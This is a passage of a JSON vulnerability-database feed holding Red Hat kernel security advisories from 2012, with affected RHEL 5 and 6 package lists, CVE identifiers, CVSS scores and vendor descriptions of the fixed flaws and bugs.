{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "python-perf-2.6.32-220.28.1.el6.i686.rpm", "packageName": "python-perf", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "python-perf-debuginfo-2.6.32-220.28.1.el6.i686.rpm", "packageName": "python-perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "i686", "packageFilename": "perf-debuginfo-2.6.32-220.28.1.el6.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-debug-devel-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-220.28.1.el6", "arch": "ppc64", "packageFilename": "kernel-2.6.32-220.28.1.el6.ppc64.rpm", "packageName": "kernel", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412.\n\nThis update also fixes the following bugs:\n\n* Previously, when a server attempted to shut down a socket, the\nsvc_tcp_sendto() function set the XPT_CLOSE variable if the entire reply\nfailed to be transmitted. However, before XPT_CLOSE could be acted upon,\nother threads could send further replies before the socket was really shut\ndown. Consequently, data corruption could occur in the RPC record marker.\nWith this update, send operations on a closed socket are stopped\nimmediately, thus preventing this bug. (BZ#853256)\n\n* When a PIT (Programmable Interval Timer) MSB (Most Significant Byte)\ntransition occurred very close to an SMI (System Management Interrupt)\nexecution, the pit_verify_msb() function did not see the MSB transition.\nConsequently, the pit_expect_msb() function returned success incorrectly,\neventually causing a large clock drift in the quick_pit_calibrate()\nfunction. As a result, the TSC (Time Stamp Counter) calibration on some\nsystems was off by \u00b1 20 MHz, which led to inaccurate timekeeping or ntp\nsynchronization failures. This update fixes pit_expect_msb() and the clock\ndrift no longer occurs in the described scenario. (BZ#853952)\n\n* Sometimes, the crypto allocation code could become unresponsive for 60\nseconds or multiples thereof due to an incorrect notification mechanism.\nThis could cause applications, like Openswan, to become unresponsive. The\nnotification mechanism has been improved to avoid such hangs. (BZ#854475)\n\n* Traffic to the NFS server could trigger a kernel oops in the\nsvc_tcp_clear_pages() function. The source code has been modified, and the\nkernel oops no longer occurs in this scenario. (BZ#856105)\n\n* Under certain circumstances, a system crash could result in data loss on\nXFS file systems. If files were created immediately before the file system\nwas left to idle for a long period of time and then the system crashed,\nthose files could appear as zero-length once the file system was remounted.\nThis occurred even if a sync or fsync was run on the files. This was\nbecause XFS was not correctly idling the journal, and therefore it\nincorrectly replayed the inode allocation transactions upon mounting after\nthe system crash, which zeroed the file size. This problem has been fixed\nby re-instating the periodic journal idling logic to ensure that all\nmetadata is flushed within 30 seconds of modification, and the journal is\nupdated to prevent incorrect recovery operations from occurring.\n(BZ#856685)\n\n* On architectures with the 64-bit cputime_t type, it was possible to\ntrigger the \"divide by zero\" error, namely, on long-lived processes. A\npatch has been applied to address this problem, and the \"divide by zero\"\nerror no longer occurs under these circumstances. (BZ#856702)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to resolve these issues. The system must be rebooted for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2012-10-23T04:00:00", "type": "redhat", "title": "(RHSA-2012:1401) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-3412"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2015-04-24T14:21:17", "id": "RHSA-2012:1401", "href": "https://access.redhat.com/errata/RHSA-2012:1401", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-12T21:09:34", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-debuginfo-common-i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.1.1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-279.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-279.1.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-279.1.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "ppc64", "packageName": "perf", "packageFilename": "perf-2.6.32-279.1.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "perf", "packageFilename": "perf-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.1.1.el6", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.32-279.1.1.el6.s390x.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A NULL pointer dereference flaw was found in the nf_ct_frag6_reasm()\nfunction in the Linux kernel's netfilter IPv6 connection tracking\nimplementation. A remote attacker could use this flaw to send\nspecially-crafted packets to a target system that is using IPv6 and also\nhas the nf_conntrack_ipv6 kernel module loaded, causing it to crash.\n(CVE-2012-2744, Important)\n\n* A flaw was found in the way the Linux kernel's key management facility\nhandled replacement session keyrings on process forks. A local,\nunprivileged user could use this flaw to cause a denial of service.\n(CVE-2012-2745, Moderate)\n\nRed Hat would like to thank an anonymous contributor working with the\nBeyond Security SecuriTeam Secure Disclosure program for reporting\nCVE-2012-2744.\n\nThis update also fixes the following bugs:\n\n* Previously introduced firmware files required for new Realtek chipsets\ncontained an invalid prefix (\"rtl_nic_\") in the file names, for example\n\"/lib/firmware/rtl_nic/rtl_nic_rtl8168d-1.fw\". This update corrects these\nfile names. For example, the aforementioned file is now correctly named\n\"/lib/firmware/rtl_nic/rtl8168d-1.fw\". (BZ#832359)\n\n* This update blacklists the ADMA428M revision of the 2GB ATA Flash Disk\ndevice. This is due to data corruption occurring on the said device when\nthe Ultra-DMA 66 transfer mode is used. When the\n\"libata.force=5:pio0,6:pio0\" kernel parameter is set, the aforementioned\ndevice works as expected. (BZ#832363)\n\n* On Red Hat Enterprise Linux 6, mounting an NFS export from a Windows 2012\nserver failed due to the fact that the Windows server contains support for\nthe minor version 1 (v4.1) of the NFS version 4 protocol only, along with\nsupport for versions 2 and 3. The lack of the minor version 0 (v4.0)\nsupport caused Red Hat Enterprise Linux 6 clients to fail instead of\nrolling back to version 3 as expected. This update fixes this bug and\nmounting an NFS export works as expected. (BZ#832365)\n\n* On ext4 file systems, when fallocate() failed to allocate blocks due to\nthe ENOSPC condition (no space left on device) for a file larger than 4 GB,\nthe size of the file became corrupted and, consequently, caused file system\ncorruption. This was due to a missing cast operator in the\n\"ext4_fallocate()\" function. With this update, the underlying source code\nhas been modified to address this issue, and file system corruption no\nlonger occurs. (BZ#833034)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2012-07-10T04:00:00", "type": "redhat", "title": "(RHSA-2012:1064) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2744", "CVE-2012-2745"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-06-06T20:24:16", "id": "RHSA-2012:1064", "href": "https://access.redhat.com/errata/RHSA-2012:1064", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:31", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-238.45.1.el5.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-238.45.1.el5.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.18-238.45.1.el5.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-2.6.18-238.45.1.el5.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-PAE-debuginfo", "packageFilename": "kernel-PAE-debuginfo-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-238.45.1.el5.i686.rpm", "arch": "i686", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-238.45.1.el5.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel", "packageFilename": "kernel-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-238.45.1.el5.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-238.45.1.el5", "packageName": "kernel-headers", "packageFilename": 